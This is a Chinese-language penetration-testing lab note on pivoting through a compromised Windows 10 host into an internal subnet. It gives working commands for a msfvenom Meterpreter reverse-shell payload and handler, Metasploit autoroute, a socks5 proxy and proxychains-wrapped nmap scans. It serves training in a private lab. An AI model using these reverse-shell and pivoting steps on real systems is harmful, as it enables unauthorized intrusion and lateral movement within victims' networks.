实验环境
网络拓扑:
kali:
- VMnet1(公网)192.168.52.134
win10:
- VMnet1(公网)192.168.52.135
- VMnet2(内网)192.168.72.133
win2008:
- VMnet2(内网) 192.168.72.132
学习参考:https://www.cnblogs.com/cute-puli/p/15510271.html
1. 拿下域内主机win10权限
这里直接msfvenom生成一个反弹shell木马。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.134 LPORT=2333 --platform windows -f exe -o shell.exe
复制到win10,
kali进入msfconsole
user exploit/multi/hanlder
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.52.134
set LPORT 2333
exploit -j
然后win10运行shell.exe就可以上线。
2. 添加路由
拿到meterpreter后,查看当前路由:
route
看到win10的路由(192.168.72.0):
我们把对应内网段的路由添加:
run autoroute -s 192.168.72.0
然后查看添加的路由:
run autoroute -p
3. 配置socks5内网代理
添加好内网路由后,background
退出meterpreter;
搜索可以做代理的模块:
socks5
search socks_proxy
使用这个模块:(这个socks5代理要设置对应账号密码)
use auxiliary/server/socks_proxy
show options
set username admin
set password admin
run
4. proxychains
| proxifier
测试连接
proxifier
对应填好:
ip: 192.168.52.134
port: 1080
username: admin
password: admin
可以看到是能连接的,访问不了外网是因为我网段都配的非NAT(方便配置)。
这里可以把测试baidu的换成192.168.72.132:445来测试:
这里尝试配置下proxifer使得能够rdp连接win2008这台域内主机。192.168.72.132
成功。
proxychains
注意!!!
proxychains
只对tcp流量有效,所以不能用udp和icmp。
kali自带有proxychains
我们在第三步设置好socks5的代理后,需要配置一下
/etc/proxychains4.conf
按照:
socks5 ip port username password
配置。
然后在所有执行的命令前加上
proxychains
即可。
这里以nmap为示例:
注意:不能用ping扫描!!!
一定要用nmap -sT -Pn
proxychains nmap -sT -Pn 192.168.72.132